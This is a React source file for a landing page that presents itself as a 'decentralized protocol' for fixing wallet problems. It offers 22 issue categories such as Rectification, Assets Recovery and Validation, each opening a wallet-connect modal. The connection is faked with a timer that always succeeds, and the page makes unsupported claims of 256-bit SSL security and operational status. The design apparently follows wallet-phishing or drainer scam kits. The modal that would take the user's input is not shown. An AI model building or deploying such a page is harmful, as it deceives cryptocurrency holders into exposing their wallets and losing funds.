import React, { useState, useMemo, useEffect } from 'react';
import { 
  Sun, Moon, Shield, RefreshCw, Layers, Key, ArrowLeftRight, FileCode,
  CheckCircle, FileText, UserCheck, Gift, Fuel, AlertTriangle, Cpu, 
  Repeat, Lock, DollarSign, Clock, Zap, Sprout, CheckCircle2, Search,
  Globe, Radio, Server, ExternalLink, ChevronDown, Activity, Check, X,
  ShieldCheck, Loader2, ArrowUpRight, Wallet, HelpCircle, Terminal, Sparkles,
  Bug, Camera, Image, Award
} from 'lucide-react';
import Header from './Header';
import WalletModal from './WalletModal';
import Footer from './Footer';
// import trustLogo from '../assets/images/trust.png';
import metamaskLogo from '../assets/images/metamask.png';
import phantomLogo from '../assets/images/phantom.png';
import walletconnectLogo from '../assets/images/walletconnect.png';
import coinbaseLogo from '../assets/images/coinbase.png';
import trustLogo from '../assets/images/trust.png';
import solflareLogo from '../assets/images/solflare.png';


const CHAINS = [
  { id: 'eth', name: 'Ethereum', symbol: 'ETH', icon: '⚡', color: 'from-blue-500 to-indigo-600' },
  { id: 'sol', name: 'Solana', symbol: 'SOL', icon: '◎', color: 'from-purple-500 to-cyan-400' },
  { id: 'bsc', name: 'BNB Chain', symbol: 'BNB', icon: '🔶', color: 'from-yellow-400 to-amber-600' },
  { id: 'polygon', name: 'Polygon', symbol: 'MATIC', icon: '💜', color: 'from-purple-600 to-pink-500' },
  { id: 'arbitrum', name: 'Arbitrum', symbol: 'ARB', icon: '🔷', color: 'from-blue-400 to-cyan-600' },
  { id: 'avax', name: 'Avalanche', symbol: 'AVAX', icon: '🔺', color: 'from-red-500 to-rose-600' },
  { id: 'base', name: 'Base', symbol: 'BASE', icon: '🔵', color: 'from-blue-600 to-blue-400' },
  { id: 'optimism', name: 'Optimism', symbol: 'OP', icon: '🔴', color: 'from-red-600 to-pink-500' }
];

const WALLETS = [
  { 
    id: 'metamask', 
    name: 'MetaMask', 
    popular: true, 
    img: metamaskLogo, 
    desc: 'Connect to your MetaMask wallet' 
  },
  { 
    id: 'phantom', 
    name: 'Phantom', 
    popular: true, 
    img: phantomLogo, 
    desc: 'Solana & Multi-chain wallet' 
  },
  { 
    id: 'walletconnect', 
    name: 'WalletConnect', 
    popular: true, 
    img: walletconnectLogo, 
    desc: 'Scan with WalletConnect to connect' 
  },
  { 
    id: 'coinbase', 
    name: 'Coinbase Wallet', 
    popular: false, 
    img: coinbaseLogo, 
    desc: 'Connect using Coinbase Wallet' 
  },
  { 
    id: 'trust', 
    name: 'Trust', 
    popular: false, 
    img: trustLogo, 
    desc: 'DApp browser & multi-asset wallet' 
  },
  { 
    id: 'solflare', 
    name: 'Solflare', 
    popular: false, 
    img: solflareLogo, 
    desc: 'Non-custodial Solana wallet' 
  }
];

const SYNC_CATEGORIES = [
  { id: 'migration', title: 'Migration', desc: 'Click here for migration or anything related to migration.', icon: ArrowLeftRight, tag: 'Core' },
  { id: 'rectification', title: 'Rectification', desc: 'Click here for rectification or anything related to rectification.', icon: RefreshCw, tag: 'Core' },
  { id: 'recovery', title: 'Assets Recovery', desc: 'Click here for recovery of lost or stuck assets.', icon: Shield, tag: 'Security' },
  { id: 'add-token', title: 'Add Token', desc: 'Click here to add custom tokens to wallet display.', icon: Key, tag: 'Wallet' },
  { id: 'bridge', title: 'Bridge', desc: 'Click here to bridge tokens across different networks.', icon: Layers, tag: 'DeFi' },
  { id: 'add-contract', title: 'Add Contract', desc: 'Click here to add and verify token smart contracts.', icon: Terminal, tag: 'Developer' },
  { id: 'whitelist', title: 'Whitelist', desc: 'Click here for whitelist verification and eligibility check.', icon: Award, tag: 'NFT/ICO' },
  { id: 'snapshot', title: 'Snapshot', desc: 'Click here for DAO voting snapshot sync and validation.', icon: Camera, tag: 'Governance' },
  { id: 'nft-issue', title: 'NFT Issue', desc: 'Click here for NFT display, metadata or minting issues.', icon: Image, tag: 'NFT' },
  { id: 'kyc', title: 'KYC', desc: 'Click here for your identity verification and KYC updates.', icon: UserCheck, tag: 'Account' },
  { id: 'claim', title: 'Claim', desc: 'Click here to claim or resolve issues while trying to claim.', icon: Gift, tag: 'Rewards' },
  { id: 'gas-bug', title: 'Resolve High Gas Bug', desc: 'Click here for high gas or unexpected transaction fee issues.', icon: Fuel, tag: 'Network' },
  { id: 'slippage', title: 'Slippage Error', desc: 'Click here for all issues related to Slippage & swap failures.', icon: AlertTriangle, tag: 'DEX' },
  { id: 'rpc-error', title: 'Resolve RPC Error', desc: 'Click here to resolve RPC connection errors and timeouts.', icon: Cpu, tag: 'Node' },
  { id: 'swap-error', title: 'Swapping Error', desc: 'Click here for token swapping or liquid liquidity issues.', icon: Repeat, tag: 'DEX' },
  { id: 'staking', title: 'Staking', desc: 'Click here for token staking/unstake related issues.', icon: Sprout, tag: 'DeFi' },
  { id: 'locked-account', title: 'Locked Account', desc: 'Click here if your account was locked or wallet stuck.', icon: Lock, tag: 'Security' },
  { id: 'missing-balance', title: 'Missing/Irregular Balance', desc: 'Click here to recover or resync your lost or missing funds.', icon: HelpCircle, tag: 'Wallet' },
  { id: 'delay', title: 'Transaction Delay', desc: 'Click here for stuck, pending or delayed transactions.', icon: Clock, tag: 'Transactions' },
  { id: 'wallet-glitch', title: 'Wallet Glitch', desc: 'Click here if you have display or state sync issues.', icon: Bug, tag: 'Wallet' },
  { id: 'defi-farming', title: 'DeFi Farming', desc: 'Click here for yield farming and commercial pool issues.', icon: Sprout, tag: 'DeFi' },
  { id: 'validation', title: 'Validation', desc: 'Click here to validate your wallet using multisig verification.', icon: CheckCircle2, tag: 'Security' }
];

export default function App() {
  const [darkMode, setDarkMode] = useState(true);
  const [selectedChain, setSelectedChain] = useState(CHAINS[0]);
  const [isChainDropdownOpen, setIsChainDropdownOpen] = useState(false);
  const [searchQuery, setSearchQuery] = useState('');
  const [selectedTag, setSelectedTag] = useState('All');
  
  // Modal states
  const [isWalletModalOpen, setIsWalletModalOpen] = useState(false);
  const [activeSyncItem, setActiveSyncItem] = useState(null);
  const [selectedWallet, setSelectedWallet] = useState(null);
  const [connectingStage, setConnectingStage] = useState(0); // 0: select, 1: connecting, 2: success
  const [connectedWallet, setConnectedWallet] = useState(null);

  // Sync the 'dark' class on the document root whenever darkMode state changes
useEffect(() => {
    if (darkMode) {
      document.documentElement.classList.add('dark');
    } else {
      document.documentElement.classList.remove('dark');
    }
  }, [darkMode]);

  const tags = useMemo(() => {
    const allTags = SYNC_CATEGORIES.map(item => item.tag);
    return ['All', ...Array.from(new Set(allTags))];
  }, []);

  const filteredCategories = useMemo(() => {
    return SYNC_CATEGORIES.filter(item => {
      const matchesSearch = item.title.toLowerCase().includes(searchQuery.toLowerCase()) || 
                            item.desc.toLowerCase().includes(searchQuery.toLowerCase());
      const matchesTag = selectedTag === 'All' || item.tag === selectedTag;
      return matchesSearch && matchesTag;
    });
  }, [searchQuery, selectedTag]);

  const handleOpenSyncModal = (syncItem = null) => {
    setActiveSyncItem(syncItem);
    setConnectingStage(0);
    setSelectedWallet(null);
    setIsWalletModalOpen(true);
  };

  const handleSelectWalletToConnect = (wallet) => {
    setSelectedWallet(wallet);
    setConnectingStage(1);
    
    setTimeout(() => {
      setConnectingStage(2);
      setConnectedWallet(wallet.name);
    }, 2500);
  };

  const handleDisconnect = () => {
    setConnectedWallet(null);
    setConnectingStage(0);
  };

  return (
    <div className={darkMode ? 'dark bg-[#070a12] text-slate-100 font-sans' : 'bg-slate-50 text-slate-900 font-sans transition-colors duration-200'}>
      <div className="min-h-screen selection:bg-cyan-500 selection:text-white">
        
        <Header 
          darkMode={darkMode}
          setDarkMode={setDarkMode}
          isChainDropdownOpen={isChainDropdownOpen}
          setIsChainDropdownOpen={setIsChainDropdownOpen}
          selectedChain={selectedChain}
          setSelectedChain={setSelectedChain}
          CHAINS={CHAINS}
          connectedWallet={connectedWallet}
          handleDisconnect={handleDisconnect}
          handleOpenSyncModal={handleOpenSyncModal}
        />

        {/* Hero Section */}
        <section className="relative overflow-hidden py-16 lg:py-24 border-b border-slate-200 dark:border-slate-800 bg-white dark:bg-[#0b0f19] transition-colors duration-300">
          <div className="absolute inset-0 bg-[linear-gradient(to_right,#1e293b10_1px,transparent_1px),linear-gradient(to_bottom,#1e293b10_1px,transparent_1px)] dark:bg-[linear-gradient(to_right,#1e293b20_1px,transparent_1px),linear-gradient(to_bottom,#1e293b20_1px,transparent_1px)] bg-[size:4rem_4rem] [mask-image:radial-gradient(ellipse_60%_50%_at_50%_0%,#000_70%,transparent_100%)]"></div>
          <div className="absolute top-1/4 left-1/2 -translate-x-1/2 -translate-y-1/2 w-96 h-96 bg-cyan-500/10 dark:bg-cyan-500/15 rounded-full blur-3xl pointer-events-none"></div>

          <div className="relative max-w-5xl mx-auto px-4 sm:px-6 text-center">
            <div className="inline-flex items-center gap-2 px-3.5 py-1.5 rounded-full bg-cyan-50 dark:bg-cyan-950/80 border border-cyan-200 dark:border-cyan-800 text-cyan-700 dark:text-cyan-300 text-xs font-mono mb-6 backdrop-blur-md shadow-sm">
              <Sparkles className="w-3.5 h-3.5 text-cyan-600 dark:text-cyan-400" />
              <span>Decentralized Cross-Chain Protocol Sync</span>
            </div>

 {/* Highlighted Notice Banner (Fixed Layout Reflows) */}
            <div className="relative mb-8 max-w-3xl mx-auto group">
              <div className="absolute -inset-0.5 bg-gradient-to-r from-cyan-500 via-indigo-500 to-purple-500 rounded-2xl blur opacity-30 group-hover:opacity-60 transition duration-500"></div>
              <div className="relative px-5 py-4 rounded-xl bg-slate-50/90 dark:bg-slate-900/95 border border-slate-200 dark:border-slate-800 text-slate-800 dark:text-slate-200 text-xs sm:text-sm font-medium leading-relaxed shadow-md backdrop-blur-xl flex items-center justify-center gap-2.5">
                <span className="flex h-2.5 w-2.5 relative shrink-0">
                  <span className="relative inline-flex rounded-full h-2.5 w-2.5 bg-cyan-500 shadow-sm shadow-cyan-500/50"></span>
                </span>
                <span>
                  We provide comprehensive protocol resolution and we are available for dApp connectivity errors, game connections, frozen transactions, swapping, token claims, KYC verification, and staking issues.
                </span>
              </div>
            </div>

            <h1 className="text-3xl sm:text-5xl lg:text-6xl font-extrabold tracking-tight text-slate-900 dark:text-white max-w-4xl mx-auto leading-tight">
              Decentralized Protocol for Syncing Various{' '}
              <span className="bg-gradient-to-r from-cyan-600 via-indigo-600 to-purple-600 dark:from-cyan-400 dark:via-indigo-300 dark:to-purple-400 bg-clip-text text-transparent">
                Wallet Issues
              </span>{' '}
              on Secure Server.
            </h1>

            <p className="mt-6 text-base sm:text-lg text-slate-600 dark:text-slate-400 max-w-2xl mx-auto leading-relaxed">
              This is not an app but an open protocol that establishes remote resolution between all non-custodial wallets and decentralized node endpoints.
            </p>

            <div className="mt-8 flex flex-col sm:flex-row items-center justify-center gap-4">
              <button
                onClick={() => handleOpenSyncModal(null)}
                className="w-full sm:w-auto px-8 py-3.5 rounded-xl bg-gradient-to-r from-cyan-500 to-indigo-600 text-white font-semibold text-sm shadow-xl shadow-cyan-500/20 hover:shadow-cyan-500/40 hover:scale-[1.02] active:scale-95 transition-all flex items-center justify-center gap-2"
              >
                <Wallet className="w-4 h-4" />
                <span>Connect & Synchronize</span>
              </button>
              <a
                href="#sync-categories"
                className="w-full sm:w-auto px-8 py-3.5 rounded-xl bg-slate-100 dark:bg-slate-900 border border-slate-200 dark:border-slate-800 text-slate-800 dark:text-slate-200 font-semibold text-sm hover:bg-slate-200 dark:hover:bg-slate-800 transition-all flex items-center justify-center gap-2"
              >
                <span>Explore Categories</span>
                <ChevronDown className="w-4 h-4 text-slate-400" />
              </a>
            </div>

            <div className="mt-14 grid grid-cols-2 md:grid-cols-4 gap-4 max-w-3xl mx-auto text-left">
              {[
                { label: 'Supported Wallets', value: '50+' },
                { label: 'Chains Synced', value: '18 Active' },
                { label: 'Security Grade', value: '256-bit SSL' },
                { label: 'Status', value: 'Operational', highlight: true }
              ].map((stat, i) => (
                <div key={i} className="p-4 rounded-xl bg-slate-50/80 dark:bg-slate-900/60 border border-slate-200 dark:border-slate-800 shadow-sm transition-colors">
                  <div className="text-xs text-slate-500 dark:text-slate-400 font-medium">{stat.label}</div>
                  <div className={`text-lg font-bold mt-1 ${stat.highlight ? 'text-emerald-600 dark:text-emerald-400 flex items-center gap-1.5' : 'text-slate-900 dark:text-slate-100'}`}>
                    {stat.highlight && <span className="w-2 h-2 rounded-full bg-emerald-500 animate-pulse"></span>}
                    {stat.value}
                  </div>
                </div>
              ))}
            </div>
          </div>
        </section>

        {/* Sync Categories Section */}
        <section id="sync-categories" className="py-16 max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 bg-slate-50/50 dark:bg-[#0d1322] transition-colors duration-300">
          <div className="flex flex-col md:flex-row md:items-end justify-between gap-6 mb-8">
            <div>
              <h2 className="text-2xl sm:text-3xl font-bold text-slate-900 dark:text-white tracking-tight flex items-center gap-2">
                Select Sync Type
                <span className="text-xs font-mono px-2 py-0.5 rounded bg-purple-100 dark:bg-purple-950/80 text-purple-700 dark:text-purple-300 border border-purple-200 dark:border-purple-800/60">
                  {filteredCategories.length} Options
                </span>
              </h2>
              <p className="text-slate-600 dark:text-slate-400 text-sm mt-1">
                Select an issue below to initiate automated remote protocol resolution for your wallet.
              </p>
            </div>

            <div className="flex flex-col sm:flex-row items-center gap-3 w-full md:w-auto">
              <div className="relative w-full sm:w-64">
                <Search className="w-4 h-4 absolute left-3.5 top-1/2 -translate-y-1/2 text-slate-400" />
                <input
                  type="text"
                  placeholder="Search issue or sync type..."
                  value={searchQuery}
                  onChange={(e) => setSearchQuery(e.target.value)}
                  className="w-full pl-9 pr-4 py-2 rounded-xl bg-white dark:bg-slate-900 border border-slate-200 dark:border-slate-800 text-xs text-slate-900 dark:text-slate-100 placeholder-slate-400 focus:outline-none focus:border-cyan-500 transition-all shadow-sm"
                />
                {searchQuery && (
                  <button 
                    onClick={() => setSearchQuery('')}
                    className="absolute right-3 top-1/2 -translate-y-1/2 text-slate-400 hover:text-slate-600 dark:hover:text-slate-200"
                  >
                    <X className="w-3.5 h-3.5" />
                  </button>
                )}
              </div>
            </div>
          </div>

          <div className="flex items-center gap-2 overflow-x-auto pb-4 mb-6 scrollbar-none">
            {tags.map(tag => (
              <button
                key={tag}
                onClick={() => setSelectedTag(tag)}
                className={`px-3.5 py-1.5 rounded-lg text-xs font-medium whitespace-nowrap transition-all ${
                  selectedTag === tag 
                    ? 'bg-cyan-500/15 dark:bg-cyan-500/20 text-cyan-700 dark:text-cyan-300 border border-cyan-500/40 shadow-sm' 
                    : 'bg-white dark:bg-slate-900 text-slate-600 dark:text-slate-400 border border-slate-200 dark:border-slate-800 hover:bg-slate-100 dark:hover:bg-slate-800'
                }`}
              >
                {tag}
              </button>
            ))}
          </div>

          <div className="grid grid-cols-1 sm:grid-cols-2 lg:grid-cols-3 xl:grid-cols-4 gap-4">
            {filteredCategories.map((item) => {
              const IconComponent = item.icon;
              return (
                <div
                  key={item.id}
                  onClick={() => handleOpenSyncModal(item)}
                  className="group relative cursor-pointer p-5 rounded-2xl bg-white dark:bg-slate-900/90 border border-slate-200 dark:border-slate-800 hover:border-cyan-500/50 hover:shadow-xl hover:shadow-cyan-500/5 transition-all duration-300 flex flex-col justify-between shadow-sm"
                >
                  <div>
                    <div className="flex items-center justify-between mb-3">
                      <div className="w-10 h-10 rounded-xl bg-slate-100 dark:bg-slate-800 border border-slate-200 dark:border-slate-700/60 flex items-center justify-center text-cyan-600 dark:text-cyan-400 group-hover:scale-110 transition-transform">
                        <IconComponent className="w-5 h-5" />
                      </div>
                      <span className="text-[10px] font-mono px-2 py-0.5 rounded bg-slate-100 dark:bg-slate-800 text-slate-600 dark:text-slate-400 border border-slate-200 dark:border-slate-700">
                        {item.tag}
                      </span>
                    </div>

                    <h3 className="text-base font-bold text-slate-900 dark:text-slate-100 group-hover:text-cyan-600 dark:group-hover:text-cyan-300 transition-colors">
                      {item.title}
                    </h3>
                    <p className="text-xs text-slate-600 dark:text-slate-400 mt-2 leading-relaxed">
                      {item.desc}
                    </p>
                  </div>

                  <div className="mt-5 pt-3 border-t border-slate-100 dark:border-slate-800/80 flex items-center justify-between text-xs text-cyan-600 dark:text-cyan-400 font-medium group-hover:translate-x-1 transition-transform">
                    <span>Synchronize</span>
                    <ExternalLink className="w-3.5 h-3.5 opacity-70 group-hover:opacity-100" />
                  </div>
                </div>
              );
            })}
          </div>
        </section>

        <WalletModal
          isWalletModalOpen={isWalletModalOpen}
          setIsWalletModalOpen={setIsWalletModalOpen}
          connectingStage={connectingStage}
          selectedChain={selectedChain}
          activeSyncItem={activeSyncItem}
          WALLETS={WALLETS}
          handleSelectWalletToConnect={handleSelectWalletToConnect}
          selectedWallet={selectedWallet}
        />


<Footer />
      </div>
    </div>
  );
}